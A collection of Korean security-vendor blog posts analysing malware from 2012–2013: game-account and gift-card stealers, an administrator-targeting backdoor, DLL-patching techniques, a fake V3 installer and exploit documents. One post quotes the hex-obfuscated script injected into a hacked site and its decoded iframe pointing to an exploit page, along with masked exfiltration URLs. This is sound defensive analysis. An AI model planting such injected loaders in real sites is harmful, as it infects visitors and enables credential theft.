2013년 7월 26일 보안뉴스에서 '언론사.포털 등 40곳 관리자 계정정보 노린 악성코드 출현!'이 보도되었다.


관련 악성코드를 분석 한 결과 유사 악성코드는 2012년 봄부터 배포되었으며 여름부터 사용자 및 관리자 계정을 훔치는 기능이 추가 된 것으로 확인되었다.


현재까지 정확한 감염 경로는 알려지지 않았지만 홈페이지를 변조해 취약한 웹브라우저로 접속 했을 때 감염되는 것으로 추정된다.  


관련 악성코드는 관계도는 다음과 같다.



1. DSC_UP0399.jpg (imagebase11381.exe) 분석


감염된 시스템은 ahnurl.sys와 olesau32.dll 파일이 생성한다. 


감염된 시스템에서 온라인 게임을 로그인 할 때 로그인 정보를 탈취하는 일반적인 온라인 게임 정보 탈취 악성코드이다. 게임 로그인 정보 외 특정 주소에 접속하면 로그인 정보를 유출하고 원격제어(백도어) 기능이 있는 파일을 다운로드 한다. 


특정 주소는 방송사, 신문사, 포털, 쇼핑몰, 게임사, 보안 시스템 관리 등으로 직원이나 관리자 시스템을 노린 것으로 추정된다.



접속하는 주소에 따라 120504.gif ~ 120547.gif 중 하나를 다운로드한다.



2. 1205xx.gif 분석


DSC_UP0399.jpg가 다운로드 한 파일은 코드는 동일하고 시스템에 등록되는 정보만 다르다. 감시 대상 시스템을 구분하기 위한 목적으로 추정된다.


악성코드가 실행되면 mpeg4c32.dll와 tcpipport.sys 파일을 생성한다. mpeg4c32.dll은 중국산 원격제어 프로그램으로 공격자가 감염 시스템을 감시 할 수 있다.

HKEY_LOCAL_MACHINE\Software\QQ\QQNETPET 에 C&C IP, Port, IP 키 생성한다


MasterDNSE는 공격자 주소, MasterPort는 포트, NetPetName은 원격제어 대상 식별자이다.


윈도우 업데이트 등 백그라운드에서 데이터를 전송 받는 서비스인 BITS Service를 중단 및 자동실행 해제하고 Parameter를 %system32%mpeg4C32.dll로 변경한다.

%SYSTEM32%MPEg4C32.dll 파일을 찾아 없으면 생성한다. 

Mpeg4c32.dll을 BITS Service 서비스로 등록해 윈도우 시작 할 때 악성코드가 실행되게 한다.


Tcpipport.sys는 mpeg4c32.dll로 부터 숨길 포트번호(80번 포트)를 받아서 통신 포트를 숨기는 역할을 한다. V3 2012.05.29.00 이후 엔진에서 Win-Trojan/Rootkit.13328로 진단한다.

3. mpeg4c32.dll 분석

MPEg4C32.dll는 시스템 IP, 악성코드의 버전(Version 1.1 Beta), 시스템 이름, 사용자 이름, 시스템 버전 등을 주기적으로 전송한다. 


mprg4c32.dll은 중국에서 제작된 원격제어 프로그램 소스를 이용해 제작한 것으로 추정된다. 


녹음, 화면 캡쳐 등의 기능이 있다. 따라서 공격자는 로그인 주소뿐 아니라 해당 시스템을 훔쳐 볼 수 있다.

V3 2012.05.29.00 이후 엔진에서 Win-Trojan/Agent.102400.ADY로 진단한다.

해당 악성코드는 V3 제품군에서 2013.07.26.05 이후 엔진에서 진단/치료(삭제)가 가능하다. 일부 변형에 대해서는 2012.03.27.04 이후 엔진에서 진단/치료(삭제)된다.

Trojan/Win32.Hidep
Trojan/Win32.Ddkr
Trojan/Win32.OnlineGameHack
Backdoor/Win32.Agent
Win-Trojan/Agent.102400.ADY

'40곳 관리자 계정 정보 노린 악성코드 출현!'이라는 기사에서 다뤄진 다수의 악성코드 분석결과 국내 온라인 게임 사용자 계정 정보 수집 기능과 특정 URL 접근시, 계정 ID와 암호를 유출하며, 원격제어 기능을 수행하는 악성코드를 추가적으로 다운로드 하는 기능이 확인 되었다. 특정 URL의 경우, 기업 내 일반 사용자 보다는 기업 인프라 관리자들이 접근하는 주소로 판단된다. 

따라서 악성코드 제작자는 감염된 시스템의 사용자가 기업 내부 인프라 접속자나 관리자인지 판단하기 위해 특정 URL 접근 여부를 확인하는 기능을 사용했고, 이 조건에 따라 관리자 시스템으로 인지한 경우 로그인 정보를 유출하고 원격에서 제어할 수 있는 추가적인 악성코드를 설치하여 기업 내부를 장악할 목적으로 해당 악성코드들을 제작/배포한 것으로 추정된다. 


신고
Creative Commons License
Creative Commons License
Posted by mstoned7

 

 악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다.

[그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드


[그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다.

최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다.

http://on****.co.kr/js/makePCookie.js

• 난독화된 악성 스크립트 링크:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27\x31\x30\x30\x27x68\x65\x69\x67\x68\x74\x3d\x27\x30

\x27\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6e\x73\x6f\x66\x74\x2e\x64

\x69//---중간생략---//\x2e\x68\x74\x6d\x6c\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");

 

• 난독화 해제 후 코드:

<iframe width='100' height='0' src='http://snsoft.******bill.co.kr/about/css.html'></iframe>

 

난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한 후 실행되도록 되어 있다. css.html은 국내 해킹된 웹 사이트에서 흔히 볼 수 있는 Exploit Toolkit인 Dadong 으로 난독화 되어 있으며, 기존의 형태와 마찬가지로 악성코드를 PC에 감염시키기 위해서 다중 취약점(JAVA, IE, Flash Player 등)을 사용했으며, 조건이 부합된 취약점을 통해서 실제 악성코드를 다운로드 및 실행하도록 해두었다.

아래 코드는 난독화된 css.html을 난독화 해제 한 후이며, 가능한 많은 PC를 감염시키기 위해서 자바 취약점 6개, Flash Player 1개, IE 1개 등 총 8개의 취약점을 사용했다.

 

Java

Flash Player

IE

CVE-2011-3544

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

CVE-2012-5076

CVE-2012-5076

CVE-2013-0634

CVE-2012-1889

[표 1] css.html이 사용한 취약점 ID


만약 PC에 위 [표 1] 중에 하나의 취약점이 존재한다면 해당 취약점으로 인해서 특정 사이트로부터 파일을 다운로드 한 후 실행한다.

-. 파일 다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe

[그림 2] up.exe의 실행구조


up.exe에 의해서 생성된 "%SYSTEM%\[서비스 이름]+32.dll"의 파일명은 감염된 PC에서 윈도우 정상 파일인 svchost.exe를 통해서 실행되는 서비스 명과 조합되며, 해당 파일을 이용하는 서비스 목록은 아래 레지스트리키 에서 확인이 가능하다.

[그림 3] svchost.exe를 통해서 실행되는 서비스 리스트


또한 up.exe는 감염된 PC의 맥 주소와 운영체제 버전정보 등을 암호화한 후 특정 IP로 전송하는 기능도 있다.

192.168.247.129 -> 116.***.121.*** UDP 360 Source port: simba-cs Destination port: 7125

[그림 4] 암호화 안된 시스템 정보

[그림 5] 암호화된 시스템 정보


 

<V3 제품군의 진단명>

  Trojan/Win32.Agent 


신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

 

 온라인 게임핵으로 인한 많은 피해사례들이 보고되고 있는 가운데, 악성코드 감염시스템을 확인해 보면 다수의 PUP 프로그램이 설치되어 있었다. 이러한 PUP프로그램을 통해 온라인 게임핵이 유포되는 경우가 종종 발견되고 있어 사용자의 주의가 필요하다.

 

많은 사람들이 무료 프로그램이나 특정 툴을 다운로드 받을 때, 제작사의 홈페이지를 통해서 프로그램을 다운로드 받는 것이 아니라, 특정 게시판이나 블로그를 통해서 다운로드 받기도 한다.

 

개인에게 무료로 제공되고 있는 V3 Lite의 설치파일(v3litesg_setup.exe)을 위장하여 V3 Lite설치와 동시에 다수의 PUP 프로그램을 설치하고, 이 중 특정 PUP 프로그램이 온라인 게임핵을 다운로드하여 설치하는 방식으로 유포되고 있었다.

 

- 악성코드 유포 블로그

[그림 1] 블로그에 게시된 악성파일

 

V3 설치파일로 위장한 파일을 다운로드 받은 후 속성을 살펴보면 안랩 홈페이지(http://www.ahnlab.com)에서 배포되는 V3 Lite의 설치버전과 다르다는 것을 알 수 있다.

 

[그림 2] V3 Lite 설치파일 비교(좌-악성 / 우-정상)

 

블로그에서 해당 파일을 다운로드 받아 설치를 진행하면 아래와 같이 다수의 제휴프로그램들의 설치에 대해 사용자 동의를 받으며, 동의를 하지 않을 경우 설치가 진행되지 않아, 사용자의 설치를 강요한다.

[그림 3] PUP 설치를 위한 사용자 동의

 

사용자가 이용약관에 동의하고 설치를 진행할 경우 V3 Lite 프로그램이 정상적으로 설치가 진행되지만, V3 Lite 설치와 동시에 바탕화면에 여러 P2P사이트와 쇼핑몰 사이트의 바로 가기 아이콘이 생성되고, 허위백신 프로그램이 설치가 된다.

 

여기서 PUP 란 불필요한 프로그램(PUP: Potentially Unwanted Program)으로 사용자가 동의하여 설치했지만 프로그램의 실제 내용이 설치 목적과 관련이 없거나 불필요한 프로그램으로, 시스템에 문제를 일으키거나 사용자에게 불편을 초래할 가능성을 가진 잠재적으로 위험한 프로그램을 말한다.

안랩은 허위 사실이나 과장된 결과로 수익을 얻는 경우나 프로그램 제작사 또는 배포지가 불분명한 경우 등 대다수 사용자가 불편을 호소한 프로그램을 불필요한 프로그램으로 진단하며, 사용자의 동의 하에 불필요한 프로그램을 검사하고 사용자가 선택적으로 삭제/허용할 수 있도록 한다.

 

설치파일 실행 시 다수의 PUP 프로그램이 설치되는데, 바탕화면에 P2P 사이트나 온라인 쇼핑몰 바로 가기 아이콘들이 생성되고, 수시로 광고 웹 페이지가 열리며, 아래와 같이 존재하지 않는 위협요소를 띄워서 사용자에게 공포심을 유발하여 결제를 유도하는 허위백신 프로그램도 함께 설치가 된다.

[그림 4] V3 Lite와 함께 설치되는 PUP 프로그램

 

이 중 "윈도우 유틸리티 업데이트(wuu_utilt*p.exe)가 온라인 게임핵을 다운로드 한 후 실행을 한다.

[그림 5] PUP 프로그램과 함께 설치되는 온라인 게임핵

[그림 6] 감염시스템의 MAC, OS, 백신프로그램 체크

 

해당 온라인 게임핵은 설치되는 과정에서 위와 같이 특정 서버로 사용 시스템의 MAC, OS, 백신프로그램의 정보가 체크되는 것이 확인되며, 최근 온라인 게임핵에서 자주 등장하는 ws2help.dll 정상파일 교체와 백신 프로그램을 무력화 하는 기능은 동일하게 나타났다.

 

이 글을 작성하는 시점에서 해당 블로그에 링크된 V3 Lite 설치파일을 다운로드 하여 설치할 경우 여전히 다수의 PUP 프로그램들이 설치가 되지만, 온라인 게임핵을 설치하는 기능을 하던 wuu_utilt*p.exe 파일이 변경되어 설치 진행 시 더 이상의 온라인 게임핵은 자동으로 설치가 되지 않았다.

 

이러한 피해사례를 사전에 예방하기 위해서는 반드시 해당 프로그램 제작사 홈페이지나 공식적인 다운로드 사이트를 통해서 내려 받아야 한다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.OnlineGameHack 외 다수


신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

국내에서는 3가지 피해사례가 끊임없이 발견되고 있다.

1. 온라인게임 계정 유출로 인한 피해

2. 안드로이드 기반의 스마트폰 소액결제로 인한 피해

3. 상품권 번호 유출로 인한 피해

 

1,2 번 항목에 해당하는 악성코드는 ASEC 블로그를 통하여 많은 정보를 게시하였다.

http://asec.ahnlab.com/793 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/772 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/search/CHEST [스마트폰 SMS 정보 유출로 인한 결제 피해]

 

국내에서는 주말을 이용하여 대량 배포되고 있는 사용자의 정보 탈취용 악성코드가 끊임없이 발견되고 있다.

그 변종 또한 셀 수 없이 많으며, 이번에는 상품권 정보가 어떻게 유출 되는지 3번 항목에 대하여 살펴 보자.

 

해당 악성코드에 감염될 경우, 파일 생성 정보와 네트워크 정보는 아래와 같다.

네트워크 트래픽을 보면 PC의 MAC, OS, 사용하는 AV 정보들을 전송하는 것을 확인할 수 있다.

 

testsample.exe     CREATE C:\WINDOWS\system32\drivers\7f12a432.sys    

testsample.exe     CREATE C:\WINDOWS\system32\kakubi.dll

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpbi.dll    

testsample.exe     DELETE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Coor.bat    

[File Monitor Information]

 

testsample.exe     TCP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     

testsample.exe     HTTP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     2xx.16.1xx.xxx/xx/get.asp?mac=3F72BD929D0****9E0C0E24FDDCC4F09&os=winxp%20Professional&avs=(V3)&ps=NO.&ver=NOON    

testsample.exe     TCP DISCONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80

[Network Monitor Information]

 

감염된 상태에서 특정 사이트를 접속하여 실제 유출되는 과정을 살펴보자.

 

- 계정 정보 탈취

[그림1] 북**** 닷컴 로그인 화면

 

위의 [그림1]은 북****닷컴 사이트의 로그인 화면이며, 로그인을 하게 되면 아래와 같은 패킷이 확인된다.

 

[그림2] 로그인 시, 패킷 덤프

 

[그림2]는 패킷을 캡쳐한 화면으로 GET 방식으로 2xx.2xx.xxx.xxx IP로 ID와 Password 가 전송되는 것을 확인할 수 있다.

 

- 상품권 정보 탈취

 

[그림3] 북****닷컴 상품권 입력 화면

 

 

[그림4] 상품권 번호 입력 시, 패킷덤프

 

로그인 후에 상품권 번호 입력을 하게 되면 로그인 계정과 마찬가지로 상품권 정보를 탈취하는 패킷을 확인할 수 있으며, 이 역시 같은 IP로 상품권 정보가 전송 된다. 테스트로 살펴본 북****닷컴 외에도 악성코드가 로드 되어 있을 때 메모리에서 아래의 사이트 String 정보들을 확인할 수 있었고 이 사이트들의 계정 정보도 탈취할 수 있다는 것을 보여준다.

 

aran.kr.gameclub.com

login.nexon.com

auth.siren24.com

bns.plaync.com

heroes.nexon.com

www.nexon.com

www.happymoney.co.kr

www.teencash.co.kr

www.cultureland.co.kr

www.booknlife.com

capogames.net

dragonnest.nexon.com

elsword.nexon.com

clubaudition.ndolfin.com

www.netmarble.net

itemmania.com

www.itembay.com

www.pmang.com

aion.plaync.jp

plaync.co.kr

maplestory.nexon.com

fifaonline.pmang.com

df.nexon.com

nxpay.nexon.com

baram.nexon.com

(생략…)

[그 외 해당 사이트들]

 

실제로 유출사례가 발견 되었고 꾸준히 발견되고 있는 악성코드인 만큼 사용자들의 각별한 주의가 요구된다.

이외에도 많은 악성코드들이 윈도우 및 응용프로그램 취약점을 통하여 감염된다.

따라서, 반드시 최신 보안패치를 설치하고, 안전성이 확인되지 않은 파일공유사이트(P2P, Torrent)등에서 받은 불법적인 파일은 실행하지 않는것이 중요하다.

 

Microsoft

http://update.microsoft.com

 

Flash Player 업데이트

http://get.adobe.com/kr/flashplayer/

 

▶ Java (JRE) 업데이트

http://www.java.com/ko/

 

▶ 한글과컴퓨터 업데이트 방법

http://asec.ahnlab.com/888 

 

<V3 제품군의 진단명>

Trojan/Win32.OnlineGameHack

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

온라인 게임에서 사용되는 개인 정보들을 탈취하기 위한 악성코드는 몇 년에 걸쳐서 한국에서 꾸준히 발견되고 있으며, 이제는 매주 주말마다 새로운 변형들을 다양한 웹 어플리케이션 취약점들과 연동하여 유포하고 있다. 이러한 온라인 게임 관련 악성코드에 대해서 ASEC에서는 그 변형들이 악용하는 유포 기법들을 지속적으로 공유하고 잇다.


2011년 10월 - ws2help.dll을 교체하는 온라인 게임 악성코드 분석


2012년 3월 - CVE-2012-0754 취약점을 이용해 전파되는 온라인 게임핵 악성코드


2012년 7월 - XML 코어 서비스 취약점 악용으로 온라인 게임 악성코드 유포


2012년 7월 - GongDa Pack의 스크립트 악성코드 증가


2012년 8월 - YSZZ 스크립트 악성코드의 지속 발견


2012년 10월 - 패치드(Patched) 형태의 악성코드 변천사


이러한 온라인 게임의 사용자 개인 정보 탈취를 목적으로하는 악성코드가 최근에서는 usp10.DLL 파일을 악용하여 보안 소프트웨어를 무력화 기능까지 포함된 악성코드가 발견되었다.


이 번에 발견된 온라인 게임 관련 악성코드는 크게 3가지 부분으로 구분 할 수 있으며, 각각 다음과 같은 기능들을 가지고 있다.


드로퍼(Dropper) - TeminateProcess를 호출하여 보안 소프트웨어 강제 종료 시도


usp10.DLL : 로드 후 자신의 부모 프로세스가 보안 소프트웨어 프로세스 중 하나라면 UnmapViewOfSection 또는 ExitProcess 호출


에브킬(AVKill) 루트킷 : NtOpenProcess와 NtTerminateProcess 후킹 해제하여 보안 프로그램 강제 종료 시도


해당 온라인 게임 관련 악성코드의 드로퍼는 다음 보안 소프트웨어와 시스템 모니터링 툴의 프로세스가 실행 중이라면 강제 종료를 시도하게 된다.



그리고 윈도우 레지스트리(Registry)를 편집하여 다음과 같은 기능을 활성하게 된다.


"숨김 파일 및 폴더를 표시 안함" 설정

세팅하여 "알려진 파일 형식의 파일 확장명 숨기기" 설정


이와 함께 2개의 스레드(Thread)를 생성하여 다음의 기능들을 수행하게 된다.


1) usp10.DLL 생성

드로퍼는 두 개의 PE 파일을 포함하고 있으며, 첫 번째 스레드는 악의적인 usp10.DLL을 C 드라이브를 제외한 모든 드라이브의 모든 폴더에 EXE 파일이 존재하는지 확인 후 해당 DLL 파일을 생성하게 된다. 


그 후 해당 EXE 파일들이 실행 될 경우, 윈도두 시스템 폴더(System32) 폴더에 존쟇는 정상 DLL 파일 대신에 해당 악의적인 usp10.DLL을 먼저 로드 하게 된다. 


2) 다른 악성코드 다운로드 및 정보 유출

두 번째 스레드는 미국에 위치한 특정 시스템에서 다른 악성코드를 다운로드 및 실행 하게 된다.그리고 미국에 위치한 또 다른 특정 시스템으로 감염된 시스템의 MAC 주소와 운영체제 정보를 전송하게 된다.


드로퍼에 의해 생성된 usp10.DLL은 윈도우 시스템 폴더(System32)에 존재하는 정상 usp10.DLL을 로드 한 뒤, 정상 usp10.DLL의 익스포트(Export) 함수들을 리다이렉트(Redirect) 시키게 된다. 그리고 다른 악성코드를 다운로드 및 실행을 시도하나 분석 당시에는 정상적으로 다운로드 되지 않았다. 이와 함께 UnmapViewOfSection이나 ExitProcess를 호출하여 보안 소프트웨어의 프로세스에 대한 강제 종료를 시도하게 된다.


이 번에 발견된 usp10.DLL 파일을 악용하여 보안 소프트웨어를 무력화 기능까지 포함된 온라인 게임 관련 악성코드는 V3 제품 군에서 다음과 같이 진단한다.


Dropper/Win32.OnlineGameHack

Trojan/Win32.OnlineGameHack

Dropper/Win32.OnlineGameHack


향후 출시 예정인 V3 인터넷 시큐리티(Internet Security) 9.0 에 포함 예정인 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.


Suspicious/MDP.DropMalware

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 그 동안 악성코드에 의해 정상 윈도우(Windows) 시스템 파일을 변조시켜 악의적인 기능을 수행하는 패치드(Patched) 형태의 악성코드에 대한 정보들을 공개하였다.


특히 다양한 온라인 게임의 사용자 정보들을 탈취하는 온라인 게임 관련 트로이목마(OnlineGameHack)에 의해 온라인 게임의 메인 실행 프로세스의 주소 공간에 악성코드인  DLL 파일을 안정적으로 실행시키기 위해 윈도우 시스템의 정상 DLL 파일들을 감염 시키는 형태가 자주 발견되고 있다.


이러한 형태의 악성코드들을 일반적으로 패치드(Patched) 형태의 악성코드라고 불리고 있으며, 현재까지 발견된 악성코드에 의해 사용되는 패치드 기법들을 다음과 같이 정리 할 수 있다.


1. DLL 파일에 악의적인 DLL 파일을 로드하는 코드 삽입 후 이 코드로 분기하도록 패치하는 형태


일반적으로 많이 알려진 패치드 형태로서, 과거 3년 전부터 발견되기 시작하였으며, 주로 패치의 대상이 되었던 윈도우 정상 DLL 파일들은 imm32.dll, olepro32.dll, dsound.dll과 같다. 


패치가 된 DLL 파일은 위 이미지와 같이 파일의 섹션 끝 부분에 쉘코드(Shellcode)가 삽입 되어 있다



엔트리포인트(EntryPoint) 변경 후에는 콜 패치(Call Patch) 등의 방법으로 삽입된 코드가 실행이 되면 아래 이미지와 같이 LoadLibraryA가 호출이 되어 악의적인 DLL 파일이 로드 된다.



2. 윈도우 정상 DLL 파일을 악의적인 DLL 파일로 교체 한 뒤, 정상의 Export 함수들을 리다이렉트(Redirect) 시키는 형태

직접적으로 윈도우 정상 DLL 파일을 악의적인 DLL 파일로 교체하는 형태를 이야기 한다. 

이렇게 윈도우 정상 DLL 파일을 감염 시켰을 경우 원래 정상 DLL 파일의 익스포트(Export) 함수들이 정상적으로 호출이 되어야 함으로 익스포트 네임 테이블(Export Name Table)에서 이 함수들로 리다이렉트(Redirect) 시켜 주게 된다.

일반적으로 대상이 되었던 윈도우 정상 DLL 파일들은 ws2help.dll이나 wshtcpip.dll 들이다.


3. AppInit_DLL 레지스트리를 이용한 악의적인 DLL 파일 로드


윈도우 정상 DLL 파일들을 직접적으로 감염 시키는 형태는 아니지만, 온라인 게임 프로세스에 악의적인 DLL을 로드하기 위해 AppInit_DLL 레지스트리를 이용하는 형태이다.


해당 레지스트리에 악의적인 DLL 파일의 파일명을 삽입하게 되면 프로세스가 생성이 될 때, 레지스트리에 있는 존재하는 악의적인 DLL 파일이 로드되는 형태 이다.


4. 온라인 게임 프로세스와 동일 경로에 윈도우 정상 DLL 파일들과 동일한 파일명의 악의적인 DLL 파일 생성


전통적인 DLL 인젝션(Injection) 기법 중 하나로 많이 알려진 형태이며, 2012년 상반기에 발견되기 시작하여 최근 자주 발견되고 있는 온라인 게임 관련 악성코드에서 사용하는 기법이다. 주 대상이 되고 있는 윈동 정상 DLL 파일은  Usp10.dll 을 들 수 있다.

 

온라인 게임 관련 트로이목마 드로퍼(Dropper)가 온라인 게임 프로세스와 같은 경로에 악의적인 usp10.dll 파일을 생성한다. 그 이후 온라인 게임 프로세스가 생성이 될 때 윈도우 시스템 폴더(system32)에 존재하는 정상 usp10.dll 파일 보다 우선 순위가 높은 CurrentPath에 존재하는 악의적인 usp10.dll을 먼저 로드 하게 된다. 그 후 악의적인 usp10.dll 파일이 악의적인 행위를 수행한 뒤에  정상 usp10.dll로 로드하여 정상적인 기능도 제공을 해주는 형태로 동작한다.


5. 리다이렉트(Redirect) 대신 LoadLibrary로 직접 정상 DLL 파일을 로드한 뒤, 해당 익스포트(Export) 함수를 호출하는 형태


각 익스포트(Export) 함수에서 직접 정상 DLL 파일을 로드한 후, GetProcAddress 함수를 이용해 정상 DLL 파일의 익스포트(Export) 함수 주소를 얻은 후 호출하여 정상적인 기능을 제공한다.

이러한 형태로 각각의 익스포트(Expor)t 함수들을 분석을 해보면 아래 이미지와 같이 쉽게 백업된 정상 DLL 파일의 파일명인 ws2helpxp.dll을 확인 할 수 있다.




6. 각각의 익스포트(Export) 함수가 널(Null)로 채워져 있거나, 인코딩(Encoding) 되어 있는 형태

 

정상 DLL 파일명을 확인하기 어려도록 하기 위한 목적으로 각 익스포트(Export) 함수가 아래 이미지와 같이 널(Null)로 채워져 있거나 인코딩(Encoding) 되어 있는 형태들이다.



최근에는 아래 이미지와 같이 문자열을 바로 보여지지 않으려는 시도까지 하고 있다.



앞서 우리는 윈도우 시스템 정상 DLL 파일들을 변조하는 패치드 형태의 악성코드들의 다양한 기법들을 살펴 보았다.


이러한 패치드 형태의 악성코드들이 자주 발견되고 있는 배경으로는 온라인 게임의 사용자 개인 정보를 탈취 하려는 목적과 연관이 되어 있으며, 최근에는 보안 소프트웨어를 무력화하기 위한 목적까지 포함되기 시작하였다.


특히 몇 년전부터 온라인 게임 관련 악성코드들은 유저모드(User Mode)와 커널 모드(Kernel Mode)에 걸쳐 다양한 기법들을 이용해 보안 소프트웨어를 무력화하고자 시도하고 있다. 최근에는 직접적으로 보안 소프트웨어를 공격하기 보다는 좀더 취약하고 방어하기 어려운 윈도우 정상 DLL 파일을 감염시켜 보안 소프트웨어를 무력화 시키고자 시도하고 있다.


이렇게 보안 소프트웨어의 발전과 함께 악성코드 역시 다양한 기법들을 동원하여 진단 및 치료를 어렵게 함과 동시에 직접적으로 보안 소프트웨어를 무력화하기 위한 다양한 기법들을 사용하고 있다. 그러므로 컴퓨터 시스템을 사용하는 개별 사용자가 시스템 관리와 보안에 대한 각별한 관심이 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

추석 연휴가 끝난 이후 ASEC에서는 최근 다양한 형태의 전자 문서들에 존재하는 취약점을 악용하는 악성코드들을 발견하였다.


전자 문서와 관련된 악성코드들이 발견되는 것이 이 번이 처음 발생한 사항이 아니지만, 마이크로소프트 워드(Microsoft Word), 한글 소프트웨어 그리고 어도비 리더(Adobe Reader) 파일인 PDF에 존재하는 알려진 취약점 등을 악용하는 악성코드가 동시 다발적으로 발견된 것은 특이 사항으로 볼 수 있다.


먼저 한글 소프트웨어와 관련된 악성코드는 크게 3가지 형태로 기존에 알려진 취약점을 악용하는 형태, 특이하게 내부에 악의적인 목적으로 제작된 자바 스크립트(Java Script)가 포함된 형태 그리고 한글 문서 자체가 특이한 OLE 포맷을 가지고 있는 형태가 발견되었다.


기존에 알려진 한글 취약점을 악용하는 취약한 한글 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "붙임1_국방기술정보 위원명단_[2].hwp (1,061,892 바이트)"로 유포되었다.



해당 취약한 한글 파일은 HncApp.dll에 존재하는 문단 정보를 파싱하는 과정에서 발생하는 버퍼 오버플로우로 인한 임의의 코드 실행 취약점을 악용하고 있으며, 이는 기존에 알려진 취약점으로 이미 한글과 컴퓨터에서 보안 패치를 배포 중에 있다.


두 번째 발견된 취약한 한글 파일은 아래 이미지와 동일하게 문서 암호가 설정되어 있는 "122601.hwp (213,133 바이트)"와 동일 한 파일명에 파일 크기만 217,231 바이트로 다른 파일이 존재한다.


해당 한글 파일들의 내부에는 아래 이미지와 동일한 형태로 특이하게 자바 스크립트(Java Script)가 포함되어 있다.



내부에 포함되어 있는 해당 자바 스크립트 코드를 디코딩하게 되면, 특정 시스템에서 ie67.exe (99,328 바이트)의 다른 악성코드를 다운로드 후 실행하도록 되어 있다.


그리고 마지막으로 아래 이미지와 동일한 내용을 포함하고 있는 "실험 리포트.hwp (7,887,360 바이트)"라는 파이명으로 유포되었으나, 해당 문서를 여는 것만으로는 악성코드 감염 행위가 발생하지 않는다.



해당 한글 파일의 OLE 포맷을 보게되면 아래 이미지와 동일하게 기존에 발견된 특이항 형태의 섹션명이 포함된 한글 파일과 유사한 형태를 가지고 있다.



어도비 아크로뱃(Adobe Acrobat)에 존재하는 알려진 취약점을 악용하는 PDF 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "안보현안분석.pdf  (679,753 바이트)" 파일명으로 유포 되었다.



해당 취약한 PDF 파일은 기존에 알려진 CVE-2009-0927 취약점을 악용하고 있으며, 2009년 3월 어도비에서 보안 권고문 "APSB09-04 Security Updates available for Adobe Reader and Acrobat"을 통해 이미 보안 패치가 배포 중에 있다.


마지막으로 발견된 마이크로소프트 워드에 존재하는 취약점을 악용하는 취약한 워드 파일은 유포 당시의 정확한 파일명은 확인 되지 않지만, 265,395 바이트의 크기를 가지고 있다.


그리고 해당 워드 파일은 CVE-2012-0158 취약점을 악용하며 보안 권고문 "Microsoft Security Bulletin MS12-027 - 긴급 Windows 공용 컨트롤의 취약점으로 인한 원격 코드 실행 문제점 (2664258)" 을 통해 이미 보안 패치가 배포 중인 알려진 취약점이다.


마이크로소프트 워드, 한글 소프트웨어 그리고 어도비 리더에 존재하는 취약점들을 악용하여 악성코드 감염을 시도하는 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


HWP/Exploit

Dropper/Exploit-HWP

Dropper/Cve-2012-0158

PDF/Exploit

Backdoor/Win32.PcClient

Dropper/Win32.OnlineGameHack 

Win-Trojan/Infostealer.28672.K

Win-Trojan/Infostealer.81920.B


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/HWP.AccessViolation-SEH

Exploit/DOC.AccessViolation-DE


향후 출시 예정인 V3 인터넷 시큐리티(Internet Security) 9.0 에 포함 예정인 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.


Dropper/MDP.Document


앞서 언급한 바와 같이 이 번에 발견된 취약한 전자 문서 파일들은 모두 기존에 알려진 취약점들을 악용하고 있으며, 마이크로소프트, 한글과 컴퓨터 그리고 어도비에서 모두 해당 취약점들을 제거할 수 있는 보안 패치들을 배포 중에 있다.


그러므로 향후 유사한 보안 위협들로 인한 피해를 예방하기 위해서는 관련 보안 패치를 설치하는 것이 중요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

